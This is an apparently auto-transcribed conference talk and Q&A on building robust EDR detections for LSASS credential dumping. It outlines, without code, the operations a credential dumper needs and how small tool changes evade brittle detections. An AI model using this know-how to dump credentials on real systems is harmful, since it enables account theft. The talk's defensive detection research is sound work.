Dissecting Tradecraft: Building Robust Detections Through Tradecraft Decomposition
Using the MITRE ATT&CK framework as a foundation, we will explore how adversary procedures can be broken down further into variants, each comprising a series of discrete operations.
About Matt Hand & Prelude
Thanks for coming. I'll skip through the majority of this. I work at Prelude. We work on threat management, just trying to make sure that EDR works the way that it does, or the way that you would expect it to when you need it to. I'm here today to talk about robust detections, specifically focused on technique stuff. How many detection engineers are here, just by a show of hands? A handful, OK.
Well, hopefully we can convince you guys that there may be a simpler way of approaching detection engineering that kind of pushes away a lot of the noise.
So we have to kind of have a bit of a reality check here for a second. Anyone here who's worked in incident response, offensive security like I used to, or really any aspect that deals with confronting incidents directly knows that right now adversaries have more tools at their disposal than ever.
Reality of our situation
2019 was the year of the C2. had, we went from, you know, a handful to feeling like hundreds, a bunch of different offensive tools up on GitHub, things that I've written live there. This is only getting worse now. The barrier to entry for capability development used to be relatively high. You used to be able to write code, test code, understand internals, understand trade craft.
Now, if you can handle just the code generation aspect, it becomes much easier. Now we have co -pilot that's trained on GitHub data that is where all of our offensive tools live. So the ability for an adversary to begin capability development is now more possible than ever. And then when they have these tools and they get caught, trivial modifications to them are very, very frequent. We see hundreds of different variations of something. So, you know, as
trivial is saying from me me cats to many dogs. It's, as simple as that. And it breaks production detections today. Unfortunately, when you start getting into more nuanced things like instruction manipulation, gets even worse. And then things start falling apart really, really quickly. And what this leads to is frankly, what I view is low skill threat actors, e -crime operators, ransomware as a service people that are just kind of, you know, throwing stuff at a wall until something sticks.
Red team operators, pen testers, they're winning today more frequently than not. And that's, that's not okay. Especially when the stakes are as high as they are today. And then imagine now what a really advanced adversary can do with actual Apex or nation state capabilities. It's a, it's a bit of a different paradigm. So our strategies for detection today, I think are fundamentally broken for like how we build detections today.
And I want to kind of talk to you about why that is and what we can do for that. So here's a map of all of the behaviors exhibited by a garden variety credential dumper. So if you've ever done reverse engineering for entire piece of malware, don't worry, this isn't the interesting part, but this is just like a summary of how complex these systems get. This is everything from I deliver a payload to I have your credentials. That's it. Just, you know,
run a thing, give me your password. That's an insane amount of information. Has anyone even been able to read all of the boxes on the slide yet? Like that's insane. That's not useful, which is the bigger problem. So the root of the problem is when we're looking at malware, when we're looking at tools, I don't think we're asking the right question in the first place. We spend so much time focused on what the code looked like.
when it was delivered, like what was the file extension and did they nest the files and all that? How was it obfuscated? What packer did they use? All of these different things that resulted in code being executed are in our purview for detection. Does that really matter? Do we care how that shellcode got into memory? Sure. In certain cases where who here does actual attribution with the ability to impose costs actually, right?
Like who works for the FBI is really what this boils down to. If you're not actually doing attribution, like, cool, get that data. But is that what you should be focusing your five detection engineers that are holding up your entire security program on their shoulders? Probably not, right? So it's arguably just not applicable for a majority of cases. Why are we focusing on it? Because it's interesting, surely. But is it useful?
We should be asking instead, what behaviors did that malware or tool exhibit? That's not a controversial detections. Behavioral detections have been around for my entire career. So if you're on 15 years now, that's not a controversial point, but we've strayed so far to like not box or scope our definition of behavior well enough. Everything that comes before and after
the execution of the technique. So if we go back to here, our credential dumper, if we're focused on detecting credential dumping, that's the only thing that matters. This second to last line, that's credential dumping. That's where we're building the detection off. Let's focus on that. Let's not worry about what shell code loader and what packer and all that. That's interesting, but not useful. So here is my thesis. Very little about a technique actually matters when you're building robust detections.
Practical example
That's the entire premise of this talk that very little of anything that we look at today truly matters when we're trying to build a detection to catch greater than one version of a thing. And by identifying whatever these basic attributes are, we can focus our efforts on those, make meaningful change and build strong, that are effective detections that are resilient in a changing environment.
So sticking with the credential dumping theme, we're going to use a tactical example of OS credential dumping from LSAS. Who here has used Mimikatz before running a Mimikatz? Pretty common, right? The whole gist of it is that if I can get a handle to LSAS, a local security authority subsystem service, LS mix setup process, I can read its virtual memory and extract credential materials from it. Pretty common. Everybody and their mother has done it.
Every threat actor that I can think of does some version of this, but native windows facilities, custom written tools, C2 frameworks, there's so many different variations of doing this, that it's pretty much like the canonical example of somebody did a bad thing. So we use this. Here is some available public tooling to do this. There may be some familiar names there, right? We see Mimikatz, that's the canonical example. There are 28.
in this list. There are 28 because I gave myself a 30 minute timer to name as many tools off the top of my head as I could. Again, I'm a red teamer by trade. These are things that I use. I got maybe a little bit more keyed in, but 28 in 30 minutes from just Google searching and memory. That's insane. Are these all actual different ways to dump credentials from LSF? I don't think so. So why are there so many?
Well, what happens when you are doing malware development, tooling development, you have to adapt to stress. So anyone who's ever done like athletic stuff, that graph right there should look pretty familiar. That's a stress recovery adaptation cycle. You introduce a stressor that hurts you, and then you adapt to that stressor and you produce something that's better and you do that iteratively. That's how you get stronger. That's, you know, all things insecurity tie back to biology. Come to find out.
So, Mimikatz in this example is pretty much the new iCar test string. Like if you drop Mimikatz on a box and it doesn't get caught, something is horrifically wrong. So we have to have a different version of Mimikatz. The stress of endpoint protection required an adaptation to our strategy for dumping credentials from LSAS. So to change this, these are only minor changes to the logic of the program that will get around detection strategies today. Again, we're so specific on...
You know, a common Mimikatz detection strategy is to flag on the process rights that are requested on a call to open process. Pretty garden variety of Mimikatz detection. Well, what if I request something different? It completely falls apart. So we can just change little tiny things about Mimi cats or another example to, to break detections. But then that's just the face value stuff. It goes so much more deep than that.
We can add or remove functionality to change down to like the size and code flow of the sample, we can swap function calls like who remembers the whole syscall thing that happened a couple years ago. That's all it is. It's just changing the entry point in the call stack. So it's not actually changing anything. You're still doing the exact same thing, just entering in a different thing. Minor changes like this happen because they're very, very low cost. And if they're already low cost at human intervention levels, not to be like the AI boogie man, but like that's what it's really good at. Like co -pilot, say, Hey dude, give me like five different ways to run this function. And it says, here you go. It's probably wrong, but it works in a case or two and it lowers the barrier to entry. Apparently like the barrier to entry for PowerPoint is too high for me. Let's see. There we go. So these changes don't cost a lot in terms of
time and effort. So they're very easy to do adversaries have this low cost to implement these so they can produce a ton of different samples, which is how we end up with those 28. So when we're looking at that crazy graph that I showed, right? And we're saying like, this is just too much. We need to just take a step back and redefine the behaviors that we would expect out of a credential dumper. But to do that, we actually run into an issue with ATT&CK.
Expanding ATT&CK
Who here has heard of ATT&CK before? Common way of referencing any kind of adversary tradecraft. Many different opinions on its usefulness, but I think we can all generally agree that if I say OS credential dumping from LSAS, and there's a more canonical way of referencing that, it's useful. ATT&CK works on a three -tier system, tactics, techniques, and procedures. Procedures are the lowest level description of doing it.
So like a technique would be OS credential dumping. But when we need to describe tradecraft, we end up going lower because we don't have a sufficient degree of resolution for what we're actually trying to say. So if we're saying OS credential dumping from LSAS, there are many different ways to do that, as we'll talk about in a second. There has to be something lower than that. So we found that there are
two layers before Prelude, worked at SpectreOps and the adversary detection team, they're going to coin the terminology, operation and function. This has been further publicized by Jared Atkinson, who's really pushing this as an idea. And I'm very, very thankful for that. But the operation is kind of that next step lower than a procedure, which is that high level steps taken of like, I need to get a handle to LSOS.
Open a handle to LSAS with sufficient privileges. It describes a step in a procedure. And the function is the specific way that you do that. a procedure will have one or greater operations, and an operation will have one or greater functions. So the function is kind of that very specific of like, Mimikatz calls open process with these writes. That level of resolution,
We already naturally do when we're reverse engineering malware or doing code review for open source tooling. We naturally think at that level. So that's what we do. When we look at these samples, we create these lists of functions. This describes the behavior of any of these tools. This is just the call stack. You're doing a code review to produce these. So I have four samples right here that we'll just pick on for no real reason. It's just a relative sample size that we can work with to show similarity.
So if we look at like each of the specific versions of this, like this is a lot to recognize. Like safety cats itself has 10 steps and all safety cats does is run Mimikatz. Like that's it. Like there's really not a lot of difference in that. But it's still 10 different things that we have to catalog. Like how would I build a detection for safety cats? Would I get it opening a handle to Elsa? Sure. Like that's a strategy. What about the call to mini dump, right?
to create the dump file that's then parsed by the loaded version of Mimikatz. We write a detection for Mimikatz being loaded. That doesn't sound like a great strategy when we know that after 30 minutes of me sitting down, I could name one per minute. That's not a good use of your time. And then this permeates down to all the other things. So then all the new tooling comes out.
What happens if somebody drops something on Twitter right now and you have to build a detection for it? Like, what are you going to do? It's just, it's this never ending thing. And this is just one technique of the 700 and something that are in MITRE ATT&CK Enterprise V15, whatever they're on right now. This is a lot. So we need to simplify this even further. So functions are just naturally how we think when we're doing reversing, when we are reviewing code for open source tooling. They are overly specific though.
Simplification
They're so keyed in on the specific way that a tool does something or a specific way that a piece of malware does something that it slight variations if we build our detection logic off of that can make our detections behavioral but brittle. So an example of this is like people who build detections off function calls. Like if you built a detection off of a call to open process, and an NT open process call happens. They're literally the exact same thing. There is no fundamental difference in this, but it will break your detection. It's too specific. We shouldn't be working at that layer. So when we're looking for commonalities between these tools, again, the robust detection is catching more than one variation of a tool or a technique. It helps to summarize at the operational level, which is just one layer higher, closer to procedure.
So that's what this looks like. We can summarize the same four samples into at most eight very specific operations. So instead of saying like, well, we called open process with these flags or whatever to catch this thing, it doesn't really matter. It's obtain the handle to LSAS. That's all that really matters out of this. We drop some of the specificity for intentional generality, which then allows us to remove noise.
Removing noise
So what happens if we strip away all of the things that are not directly related to or required for credential dumping in this example? So going back, we have perform system checks as a common thing, resolve functions as a thing. Like some of these operations, are shared amongst things, but are they actually required? So we can minimize the set even further and say, well, this is the stuff that is actually required to dump LSAS. The only things that are technically required are a handle to LSAS and a call to read its memory. Those are the only things that are truly required. And depending on the way in which you read memory, there may be one or two small variations to it, but not a substantial amount.
So in order to do this, like we already had this minimized set. We took functions that came from the product of reversing. We summarize those and then we removed all of the nonsensical information that just isn't actually required. So there are significant overlaps when we go back here to the mandatory operations that are common between samples. So each action in here leads to the next. It's an ordered set.
Which creates a unidirectional graph, a graph that flows one way. So if we can take those four samples and merge them into one graph that demonstrates control flow, it'll end up looking like this. Graphs are super cool. It's just like a nice logical way to think about things, but it actually represents the control flow of operations. So in our four samples, the commonalities between them were adjusting token privileges. The token privilege you need to dump credentials is se -debug privilege.
You need to locate the process identifier for LSAS .exe, which is a requirement for the open process called to get a handle. And once you have a handle, you can then pass that to a function which will read LSAS's memory. Pretty common flow, but this is the fundamental steps of how almost every credential number works. But even then, those can be qualified further. So why weren't all of those present in every tool?
Qualifying operations
Well, simply put, they're not actually required. So think of things that can be done outside of the specific sample. Can you derive LSAS's PID and pass it as a command line argument to a tool? Of course, that's how a good majority of them work. Can you ensure that se -debug privilege is enabled for the token under the context that you're going to run the credential dumper? Of course, you don't actually have to check it. You can just say, I assume that this is enabled. If not, I'm just going to fail.
Not a great development strategy, but a realistic one. This creates two different categories. There are mandatory operations, things that have to happen, and supporting operations, things that can happen to facilitate the mandatory operation. So think mandatory is you have to see this in the credential dumper. Supporting operations is you likely will see this in the credential dumper. Does that make sense? Nobody's asleep yet. This is good. Okay.
Action-oriented detection engineering
So we have 28 tools that we reduced down just to two mandatory actions. Obtain a handle to LSAS, read LSAS's memory. Those are the only two things that mattered for the credential dumper. This is intuitive. We know this already, but now we have a language to define it and we can build detection strategies off of it. So now we have these actions or operations well -defined, now it becomes a game of, what can your EDR do about that? So obtaining a handle to LSAS, it's a pretty common one. This is how most EDRs catch OS credential dumping is watch for a handle being open to a process object. If a process object matches the name LSAS .exe, then return to me the request and sometimes block it depending on the vendor. But that exists in pretty much everything today.
Some EDRs have a remote virtual memory read detection. If we have those in our EDR, we can say, well, I can catch it here on this mandatory operation, or I can catch it here. But which one would you choose? The trick to all of this is in that graph that I showed, what is the right most node? What is the final action taken?
Is opening a handle to LSAS actually indicative of credential dumping? Of course not. It's just opening a handle to LSAS. You could do that in a benign sense. For some reason, Google Update Helper does that. So we have to write an exclusion. Does Google Update Helper read LSAS's memory, though? I really hope not. Not the legitimate version. It may. That would be terrifying.
So we have to pick one of them, just orient to the right most, start there and then work your way back. And what that does is say like, this is the most indicative of the thing. If I don't have telemetry for that, go to the second thing. It's still a mandatory operation. So has to happen, but I can decide there that like, this is the best version of it. Once you start going into supporting operations, the detection starts falling apart and then further down the track, then it starts really kind of falling apart of like assuming that a file will be written because you do a mini dump write dump. Well, what happens if you use a callback in mini dump write dump and now all of sudden it doesn't work? Focus right, work your way backwards as needed.
Validating with functions
So now that we have a detection strategy, we know rightmost node and the mandatory operations category is our strategy, then we have to validate it. And this is where things get interesting and you really start finding out how weird offensive security tooling actually is and how similar everything is. So if we classified everything into a family of saying like, credentialing is comprised of these two or four parts, depending on how we want to talk about it. What are the unique expressions of those two or four things? And that's where you start creating these families. And these families are identified by how it achieved those operations. What functions specifically did it use?
So this may be to open a handle to LSAS. It may be a call to open process, maybe a call to NT open process. It may be stealing a handle. It may be leaking a handle from the kernel. There are all of these different ways of doing that. Those are four different ways that I just named. And then reading virtual memory, it may be read process memory. It may be like a duplication or like a kernel, but it's an arbitrary read.
There are a bunch of different ways, mini dump, write dump, mini dump, write dump with a callback and so have you. These are all unique ways, unique functions that describe an operation. But when you catalog all of those and we go back to our original graph saying like, hey, these tools use these functions, you start finding that there's massive overlap. And what actually changes is language that was used.
the evasion figurative crap stacking that tends to happen of like, I'll just stack this ETW disable thing and then I'll use direct sys calls and then I'll turn off defender and all that stuff. And then I'll do credential dumping. It's like that didn't matter at all. It's just nonsense that you stacked in here. Just ignore it. It's very safe to just ignore. And then if we say, okay, well then I actually just use open process and mini dump, right dump. Well, so did these other 15 tools and you create these families.
And that becomes your validation set. Those are unit tests for your detections. And now you have a strategy for validating these now robust detections that are built off of these mandatory operations. So wrapping this up, don't focus on the tool specifically when building technique or procedure -based detections. If we have a...
a general understanding of what the flow of a technique is, what is the mandatory operations that have to happen here. We can then say, I don't care about the tools. I'll build a detection for those operations and then validate with the tools later as a unit test. And then you could take all 28 that I named and ran them through it. And then you wouldn't really see a difference. You just catch them because the operations are all the same. The functions are the only thing that are different. And then when we're analyzing malware or any kind of tooling,
Just take a step a little bit below the procedure level. Don't go so deep that you naturally would when you're doing like a code review or reverse engineering and say, you know, here are the specific functions that were used. That's too low resolution. You want somewhere between procedure and function, which is naturally operation. So just summarize operation in human language. Whatever makes sense to you, there's no agreed upon language. MITRE is not going to extend ATT&CK to do this. This is all an idea that you keep in your head and just think,
I'm describing a technique and I'm looking at a sample that is comprised of functions. Let me summarize the functions into something that I can use.
Acknowledgements
So just two quick acknowledgements here. Two people have contributed greatly to my viewpoints on this and how I've grown to understand this as time has gone on, especially coming from like a red team perspective. I'm used to breaking things and trying not to get caught. Now I'm really in the business of trying to catch everything that I broke. Michael Barclay, brilliant researcher on my team. He wrote a really cool tool called Cartographer that actually models all of this behavior. So he has Cartographer run as the website.to the web app, but go poke around there and kind of see what this looks like in practice.
And then of course, Jared Atkinson, he has a blog series called On Detection that discusses these in an incredible amount of detail, the philosophy behind like why we think this way and some of the ways that we can think about this slightly differently. Two brilliant researchers I'm very, very thankful for learning from.
But that's the end of the talk. I'm happy to answer any and all questions here or at our booth. Just as a quick note, we have a booth in the expo hall that I'm hanging out at all week. So if you want to come talk about this long form where questions in front of the room aren't really your forte, come meet us there. I'm happy to talk for however long you'd like to.
Question and answer
Scheduled tasks is a good one, because that one's actually like not really that complicated, but it's everywhere. Services too, and Jared's blog post, he uses like, I use credential dumping for everything. Jared uses services for his, that's another really interesting one that a lot of the research is pre-done.
The first one is you said MITRE or ATT&CK wouldn't solve this necessarily. So I would, because these are, I believe, repeated things, like when you do it once, I believe you can share it with others. do we maybe need a framework that tries to solve this at a deeper level? And the second question is, like some of these stuff are out of the detection engineering hands. Like for example, these can be solved at an EDR level because they target specific telemetry that you cannot necessarily try to get or understand because the EDR abstracts it for you. So perhaps he says, I detect credential dumping, but you don't necessarily have the information. So I don't know, can we maybe distinguish between the consumer of the telemetry from the EDR and the detection engineer at the EDR level necessarily, if that makes sense.
Yeah, those are two really great questions. So the first one, and make sure I don't miss these, I'm train of thoughts gonna go all over the place. So the first one was around, know, ATT&CK not really being adaptable to this. I don't necessarily think that it's impossible to adapt. I just think that it's not incentivized to do so. I agree, this is largely a one time effort.
It does change operating system version, operating system version. That's kind of what my team does is that the research into this area. I agree that like it's kind of a knowledge sharing thing to a certain degree. And a big thing that I'm passionate about is like, researchers are really expensive, hard to find, and usually pretty prickly. Not everyone can afford or should have researchers. if someone's going to do the research, we should share it and make sure that people are able to do it. That way the barrier to entry isn't your research ability, it's your ability to build a good detection in your environment. So I don't think MITRE will accept this because it's such a massive thing and it doesn't really hold true. They just add like financial theft as a technique and like what are the procedures of that, let alone like operations, like open a bank account. Like what am I gonna do about that? It doesn't matter. So it doesn't really apply to their model in general.
Maybe it is a different way of talking about it. Michael Barclay's Cartographer project is what we're kind of hedging on of just like having a way to discuss it. And if that's something you're interested into, contributions are very welcome there. But it's like the XKCD comics, this standard sucks. Let's build another standard five years later. This standard sucks. So I don't know if a new framework will solve it.
In terms of like detection engineering, decoupling that from the EDR, those are very real problems that we deal with. I'm not going to show my company too much here, but like we're, we see where the EDR failure points are and they differ from vendors greatly. And at some point, you know, it's say SentinelOne, they use a lot of aggregate events. So saying like this event and this event mean this thing, but I can't see event A or event B, they just combine them all.
That's really tough to say like, well, what part did you see? That comes down to just kind of making a demand of your vendor and being like, hey, like I appreciate you doing this thing, but you've abstracted too much and just being vocal with your vendors and saying, hey, I actually need visibility into this data. And if they don't have it, you know, make noise. That's really the best that we have today. But yeah, I agree. It's a very sore point that I'm very invested in solving.
Hi, great talk. Completely agree with everything you're saying. I was curious about, because when you have like generic detection, like you mentioned quickly, like you also gonna have positive snack really. Yes. And things change and you have a big environment and like, there's a lot of weird things going on, right? So I'm thinking like, do you think the same type of reasoning can be used to create those like exclusions. So instead of like this specific, you know, Chrome, whatever you said, but could you do like the same or like, so it doesn't become too specific when it comes to handling those like whitelisting. Yeah. Like what was your view when it comes to handling that?
Exclusions are so dangerous just for the natural reasons of, know, as soon as you introduce an exclusion that's in the opportunity for a bypass. You whitelist a file and now all of sudden malware can masquerade as that. Those are legitimate problems. But what we found exploring this methodology is that by using these mandatory operations, the further right you go, the fewer false positives there are. So like Google Update Helper thing, right? Like that's opening a handle. You have to write an exclusion for it. Google Update Helper does not read memory.
So if you can build your detection around reaching memory or reading memory, there are fewer total events period for you to have to write exclusions on. So those exclusions become much more tolerable to have be specific. For the methodology of applying this side to what you exclude, I think it becomes tricky because the difference between a false positive and a true positive can sometimes be immeasurable. Like they may do the exact same thing and there's no real way to distinguish it, there's other attributes then that you look at of like, you know, was the calling binary sign?
Like what's the, like all the traditional things that you would do, but right now the exclusions are kind of a weak point of like, now we have to have complex joins and it just gets messy. But yeah, I'd be really interested to hear if anybody had thoughts on that specifically, cause that is a, it's a realistic part of the ecosystem right now. Thank you.
Related content
Stop wondering how your EDR actually works
Matt Hand breaks down the agents and sensors that make up the modern EDR—and what we can learn from them.